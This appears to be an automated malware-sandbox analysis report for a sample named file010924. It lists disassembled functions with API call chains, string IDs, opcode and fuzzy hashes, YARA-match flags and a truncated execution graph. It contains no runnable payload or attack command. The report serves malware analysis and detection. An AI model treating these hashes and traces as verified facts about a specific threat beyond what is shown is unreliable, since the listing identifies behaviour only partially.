                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                • String ID:
                • API String ID: 384356119-0
                • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                • Instruction ID: 95a0f2107fc556e57bfd004512c06606368224756b3155c0aa35b4faa84ecb51
                • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                • Instruction Fuzzy Hash: 5E710A72A00717ABD724BE79CC40B6AB3B9AF51724F144279E514EBA80E774DA008BD0
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                • String ID:
                • API String ID: 3432600739-0
                • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                • Instruction ID: 9f39b6482382ec7a155fa5ffa424e2fceddfa7a0f7f2c6e6b8cada65597fcf15
                • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                • Instruction Fuzzy Hash: 08412732904305AFDB20BFA4DD4279E7BFAEF44314F20442DEA145E291DB759645DF11
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _free$ExitProcess___crt
                • String ID:
                • API String ID: 1022109855-0
                • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                • Instruction ID: a6d39d6db999a2b8cb5f3907181483eb5b7cfe71e5f9f3965aac13be6bf82b6b
                • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                • Instruction Fuzzy Hash: 4F31B432900358DBCB21BF14FC8084A77E6FB14324794862AE9485B2A4CBF459C9AF94
                APIs
                • std::exception::exception.LIBCMT ref: 023AFC1F
                  • Part of subcall function 0239169C: std::exception::_Copy_str.LIBCMT ref: 023916B5
                • __CxxThrowException@8.LIBCMT ref: 023AFC34
                • std::exception::exception.LIBCMT ref: 023AFC4D
                • __CxxThrowException@8.LIBCMT ref: 023AFC62
                • std::regex_error::regex_error.LIBCPMT ref: 023AFC74
                  • Part of subcall function 023AF914: std::exception::exception.LIBCMT ref: 023AF92E
                • __CxxThrowException@8.LIBCMT ref: 023AFC82
                • std::exception::exception.LIBCMT ref: 023AFC9B
                • __CxxThrowException@8.LIBCMT ref: 023AFCB0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                • String ID: leM
                • API String ID: 3569886845-2926266777
                • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                • Instruction ID: 97e4395668a87124e9a09f88509e9f71ea7aa5fe5b5d198a5bbd2d94c06f583f
                • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                • Instruction Fuzzy Hash: CA11CB79C0020DBBCF10FFA5D855CEEBBBDEA04344F408566AD68A7641EB74A7488F94
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _free_malloc_wprintf$_sprintf
                • String ID:
                • API String ID: 3721157643-0
                • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                • Instruction ID: fc955bcfc24e3ee97ae38fa8eede7155f6b148bdd5cd72be6a56e960f7a68407
                • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                • Instruction Fuzzy Hash: 751124B29006943AC671B7B41C15EFF3ADD9F45702F0400A9FE8DE9180DB585A059BB1
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throw$_memset$_malloc_sprintf
                • String ID:
                • API String ID: 65388428-0
                • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                • Instruction ID: 8ce8992ff63cd9c7d06224bb68af63ae237c7e4fb4ed25f7c162af888fb2959e
                • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                • Instruction Fuzzy Hash: D6514B72D40209BBDF20EBA5DC86FEFBBB9FB05744F100025F949B6190E7746A058BA5
                APIs
                • __getptd.LIBCMT ref: 00404FE3
                  • Part of subcall function 00405981: __getptd_noexit.LIBCMT ref: 00405984
                  • Part of subcall function 00405981: __amsg_exit.LIBCMT ref: 00405991
                • __amsg_exit.LIBCMT ref: 00405003
                • __lock.LIBCMT ref: 00405013
                • InterlockedDecrement.KERNEL32(?), ref: 00405030
                • _free.LIBCMT ref: 00405043
                • InterlockedIncrement.KERNEL32(022B2D40), ref: 0040505B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1232488988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1232477992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232488988.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232544034.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232558566.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232609303.000000000064A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_66d5df681876c_file010924.jbxd
                Similarity
                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                • String ID: ( J
                • API String ID: 3470314060-3398582886
                • Opcode ID: 34ad38f7c54dc83f41d7761572d6cf32181336fbf46893ce656edfbc391585dd
                • Instruction ID: bc3f2a170a03e6d1ed12ad22bd1d06453275e924241b71422263d52d5a5e05e0
                • Opcode Fuzzy Hash: 34ad38f7c54dc83f41d7761572d6cf32181336fbf46893ce656edfbc391585dd
                • Instruction Fuzzy Hash: 1F018B75900A12ABC721AB29990575FBBA0AB09728F05003BE940776D1CB7CA842EFDD
                APIs
                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,004A1380,00000008,0040595C,00000000,00000000,?,00404594,?,00000000,004039DD), ref: 00405865
                • __lock.LIBCMT ref: 00405899
                  • Part of subcall function 00406A1F: __mtinitlocknum.LIBCMT ref: 00406A35
                  • Part of subcall function 00406A1F: __amsg_exit.LIBCMT ref: 00406A41
                  • Part of subcall function 00406A1F: EnterCriticalSection.KERNEL32(00000000,00000000,?,0040589E,0000000D), ref: 00406A49
                • InterlockedIncrement.KERNEL32(?), ref: 004058A6
                • __lock.LIBCMT ref: 004058BA
                • ___addlocaleref.LIBCMT ref: 004058D8
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1232488988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1232477992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232488988.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232544034.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232558566.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232609303.000000000064A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_66d5df681876c_file010924.jbxd
                Similarity
                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                • String ID: ( J$KERNEL32.DLL
                • API String ID: 637971194-38078593
                • Opcode ID: 54b149fa29c665a3b07f048601e02bcd21d22eaf12896e65975971bd61ffc5db
                • Instruction ID: 24a26b9e2260a12e30a1db9a323024d0000528331ba520c35167c1df9dc3c7be
                • Opcode Fuzzy Hash: 54b149fa29c665a3b07f048601e02bcd21d22eaf12896e65975971bd61ffc5db
                • Instruction Fuzzy Hash: E1018E71800B00EED720AF66D90670ABBE0EF55328F10892FE596766E0CBB8A554CF18
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throw$_memset_sprintf
                • String ID:
                • API String ID: 217217746-0
                • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                • Instruction ID: 9c56b148ce216fdac8d7ffebf452d7d3e905040d8b537b9fb2480d8d652cb377
                • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                • Instruction Fuzzy Hash: 91514FB1D40209BADF21DFA1DC46FFEBBBDEB05704F244025F906B6180E775AA058BA5
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throw$_memset_sprintf
                • String ID:
                • API String ID: 217217746-0
                • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                • Instruction ID: 03f5f75794eae3382d5f87d8e43f133ddfabf52f6b154eb8e7b3637987a8c1b1
                • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                • Instruction Fuzzy Hash: 62515F71D40209BADF21DFA5DC46FFEBBBDEB05704F104129FA06B6180E774AA058BA4
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                • String ID:
                • API String ID: 3534693527-0
                • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                • Instruction ID: 299cf9275ad3bfbca1bcc319cba99f6d8d670f4ea18ac593b0011af94b54ad36
                • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                • Instruction Fuzzy Hash: 6231C372A043266BDB32BB689C11B6F6BA9DF05B68F114435EE04EF284DB74C541CBA1
                APIs
                • __getptd_noexit.LIBCMT ref: 024266DD
                  • Part of subcall function 023859BF: __calloc_crt.LIBCMT ref: 023859E2
                  • Part of subcall function 023859BF: __initptd.LIBCMT ref: 02385A04
                • __calloc_crt.LIBCMT ref: 02426700
                • __get_sys_err_msg.LIBCMT ref: 0242671E
                • __invoke_watson.LIBCMT ref: 0242673B
                • __get_sys_err_msg.LIBCMT ref: 0242676D
                • __invoke_watson.LIBCMT ref: 0242678B
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                • String ID:
                • API String ID: 4066021419-0
                • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                • Instruction ID: 39293a973173c0fcffceba0c70ccdb73855a82f26ecba988cf321824da0bfbcb
                • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                • Instruction Fuzzy Hash: 5A11C471601B257BEB357A26AC00B7B779EDF407A0F820467FE08AB741E721D9044AE4
                APIs
                • _malloc.LIBCMT ref: 00409A90
                  • Part of subcall function 00404777: __FF_MSGBANNER.LIBCMT ref: 00404790
                  • Part of subcall function 00404777: __NMSG_WRITE.LIBCMT ref: 00404797
                  • Part of subcall function 00404777: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00407DBE,00000000,00000001,00000000,?,004069AA,00000018,004A13D0,0000000C,00406A3A), ref: 004047BC
                • _free.LIBCMT ref: 00409AA3
                Memory Dump Source
                • Source File: 00000000.00000002.1232488988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1232477992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232488988.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232544034.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232558566.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232609303.000000000064A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_66d5df681876c_file010924.jbxd
                Similarity
                • API ID: AllocHeap_free_malloc
                • String ID:
                • API String ID: 2734353464-0
                • Opcode ID: 2b223fead71153d923d65b16adf7dbaac1e17d84e9be0525e066f0adeda1b706
                • Instruction ID: 811332a90f73e159becba367169f8b593f12006e13c95f9776a1461875f5fd7d
                • Opcode Fuzzy Hash: 2b223fead71153d923d65b16adf7dbaac1e17d84e9be0525e066f0adeda1b706
                • Instruction Fuzzy Hash: 8111C8326009559BCB212F75E804A5B3A94DB503A5B20443BF949BA2E2EF7D8C409A9C
                APIs
                • __getptd.LIBCMT ref: 00405764
                  • Part of subcall function 00405981: __getptd_noexit.LIBCMT ref: 00405984
                  • Part of subcall function 00405981: __amsg_exit.LIBCMT ref: 00405991
                • __getptd.LIBCMT ref: 0040577B
                • __amsg_exit.LIBCMT ref: 00405789
                • __lock.LIBCMT ref: 00405799
                • __updatetlocinfoEx_nolock.LIBCMT ref: 004057AD
                Memory Dump Source
                • Source File: 00000000.00000002.1232488988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1232477992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232488988.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232544034.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232558566.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232609303.000000000064A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_66d5df681876c_file010924.jbxd
                Similarity
                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                • String ID:
                • API String ID: 938513278-0
                • Opcode ID: bfe58fe74ae8f077a6f47e7b6f5d95cbe904bd6c7025e02d9fcc56d2649cf320
                • Instruction ID: 3c8245ced7475295900e9638de439af8fe1fd081d79cc071e6c19f6c0352b67a
                • Opcode Fuzzy Hash: bfe58fe74ae8f077a6f47e7b6f5d95cbe904bd6c7025e02d9fcc56d2649cf320
                • Instruction Fuzzy Hash: F2F06D72944B10DAD625BB695C02B2F77A0EF01B28F11012FE915772D2CB7C5901AE5E
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: D
                • API String ID: 2102423945-2746444292
                • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                • Instruction ID: e286b51fbd05d572bc3a113d26df35b2202b34336083867073e7d6deffac940e
                • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                • Instruction Fuzzy Hash: 15E14C71D0021AABDF24DBA0DD89FEFB7B9BF04304F14406AE909E6190EB756A45CF54
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: $$$(
                • API String ID: 2102423945-3551151888
                • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                • Instruction ID: 1009b3c315839453f1f804ab922e70f368c408ac0b903d865ccc81c9323da2bd
                • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                • Instruction Fuzzy Hash: 0191C071D0025DEAEF20DFA0CC59BEEBBB9AF05304F148069D405BB285DBB65A48CF65
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _wcsnlen
                • String ID: U
                • API String ID: 3628947076-3372436214
                • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                • Instruction ID: e18f40707809464c5321034b2fd2ef0764c1fe8a8695b3182cfb9401859ad624
                • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                • Instruction Fuzzy Hash: F4212B32614308BAEB10BAA4DC45BBE73ADDB45750FD14165FD08CE1D0FB70ED448AA4
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: p2Q
                • API String ID: 2102423945-1521255505
                • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                • Instruction ID: 84b0c05aa1d88223be7ba81adbd58d8185bd1176d0fa57417680519904196a3b
                • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                • Instruction Fuzzy Hash: F7F0C068694791B5F7217B50BC267857D926B31B08F104045D1142E3F1E2F9234C6799
                APIs
                • std::exception::exception.LIBCMT ref: 023AFBF1
                  • Part of subcall function 0239169C: std::exception::_Copy_str.LIBCMT ref: 023916B5
                • __CxxThrowException@8.LIBCMT ref: 023AFC06
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                • String ID: TeM$TeM
                • API String ID: 3662862379-3870166017
                • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                • Instruction ID: af3fe71c18ee0bbb88a00e6c9f9f06c8ed06b5f86eb358fbc19107f5ae024e9e
                • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                • Instruction Fuzzy Hash: 05D06775C0020DBBCF00EFA5D459CDDBBB9AA05344B008466AD58A7241EA74A7498F94
                APIs
                  • Part of subcall function 0238197D: __wfsopen.LIBCMT ref: 02381988
                • _fgetws.LIBCMT ref: 0236D15C
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: __wfsopen_fgetws
                • String ID:
                • API String ID: 853134316-0
                • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                • Instruction ID: 209c08f46b4a7f9515dfcab45dd3f0ba8a9b562f1d3844825ba963cb35c3442a
                • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                • Instruction Fuzzy Hash: 5891B372E1031DABCF20EFA4CD49BBEB7B9AF04304F244529E815A7244E775EA14CB95
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _malloc$__except_handler4_fprintf
                • String ID:
                • API String ID: 1783060780-0
                • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                • Instruction ID: a176491051187673549046d14885f2e4b322438a3b208b6e0fac56010109b480
                • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                • Instruction Fuzzy Hash: 83A15FB1C00249EBEF21EFA4CC59BEEBB76AF14304F144128D5057A291D7B65A48CFA6
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                • String ID:
                • API String ID: 2974526305-0
                • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                • Instruction ID: 071f4f26885488f96cccc5683231fe5721931ac3fb450cd37e2969d7a7eff57a
                • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                • Instruction Fuzzy Hash: 2451A170A0138A9BDB2AAF798D8466FB7B6AF40324F148729ED359E6D0D7709950CB40
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1232488988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1232477992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232488988.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232544034.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232558566.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232609303.000000000064A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_66d5df681876c_file010924.jbxd
                Similarity
                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                • String ID:
                • API String ID: 3016257755-0
                • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                • Instruction ID: 7fc76be4f533abd212cf5425c13b859c9203659f93351ddc8534f6644513f51f
                • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                • Instruction Fuzzy Hash: 0F11437200024ABBCF125F85CC41CEE3F72BF19354B598426FE1869171D73ACA72AB86
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                • String ID:
                • API String ID: 3016257755-0
                • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction ID: cdbbb438fd8961f38441f96d26480badb7f1f3308749e04775937497531ad978
                • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction Fuzzy Hash: 1D01483240014ABBCF225E84DC25CEE3F67FB19354F488565FA9D58970D336C5B2AB81
                APIs
                • ___BuildCatchObject.LIBCMT ref: 02427A4B
                  • Part of subcall function 02428140: ___BuildCatchObjectHelper.LIBCMT ref: 02428172
                  • Part of subcall function 02428140: ___AdjustPointer.LIBCMT ref: 02428189
                • _UnwindNestedFrames.LIBCMT ref: 02427A62
                • ___FrameUnwindToState.LIBCMT ref: 02427A74
                • CallCatchBlock.LIBCMT ref: 02427A98
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                • String ID:
                • API String ID: 2901542994-0
                • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                • Instruction ID: 1d39acb3a7fdd21673e433f8c5078fde79cf915d2a67fb9c2895f4be97777c39
                • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                • Instruction Fuzzy Hash: 6E011732000119BBCF12AF56CC00EEB7BBAEF48754F55801AFA1865220C732E9A5DFA0

                Execution Graph

                Execution Coverage:2%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:35.4%
                Total number of Nodes:810
                Total number of Limit Nodes:89
                execution_graph 44673 423f84 44674 423f90 ___lock_fhandle 44673->44674 44710 432603 GetStartupInfoW 44674->44710 44677 423f95 44712 4278d5 GetProcessHeap 44677->44712 44678 423fed 44679 423ff8 44678->44679 45042 42411a 58 API calls 3 library calls 44678->45042 44713 425141 44679->44713 44682 423ffe 44683 424009 __RTC_Initialize 44682->44683 45043 42411a 58 API calls 3 library calls 44682->45043 44734 428754 44683->44734 44686 424018 44687 424024 GetCommandLineW 44686->44687 45044 42411a 58 API calls 3 library calls 44686->45044 44753 43235f GetEnvironmentStringsW 44687->44753 44690 424023 44690->44687 44693 42403e 44694 424049 44693->44694 45045 427c2e 58 API calls 3 library calls 44693->45045 44763 4321a1 44694->44763 44698 42405a 44777 427c68 44698->44777 44701 424062 44702 42406d __wwincmdln 44701->44702 45047 427c2e 58 API calls 3 library calls 44701->45047 44783 419f90 44702->44783 44705 424081 44706 424090 44705->44706 45039 427f3d 44705->45039 45048 427c59 58 API calls _doexit 44706->45048 44709 424095 ___lock_fhandle 44711 432619 44710->44711 44711->44677 44712->44678 45049 427d6c 36 API calls 2 library calls 44713->45049 44715 425146 45050 428c48 InitializeCriticalSectionAndSpinCount ___lock_fhandle 44715->45050 44717 42514b 44718 42514f 44717->44718 45052 4324f7 TlsAlloc 44717->45052 45051 4251b7 61 API calls 2 library calls 44718->45051 44721 425154 44721->44682 44722 425161 44722->44718 44723 42516c 44722->44723 45053 428c96 44723->45053 44726 4251ae 45061 4251b7 61 API calls 2 library calls 44726->45061 44729 42518d 44729->44726 44731 425193 44729->44731 44730 4251b3 44730->44682 45060 42508e 58 API calls 4 library calls 44731->45060 44733 42519b GetCurrentThreadId 44733->44682 44735 428760 ___lock_fhandle 44734->44735 45073 428af7 44735->45073 44737 428767 44738 428c96 __calloc_crt 58 API calls 44737->44738 44739 428778 44738->44739 44740 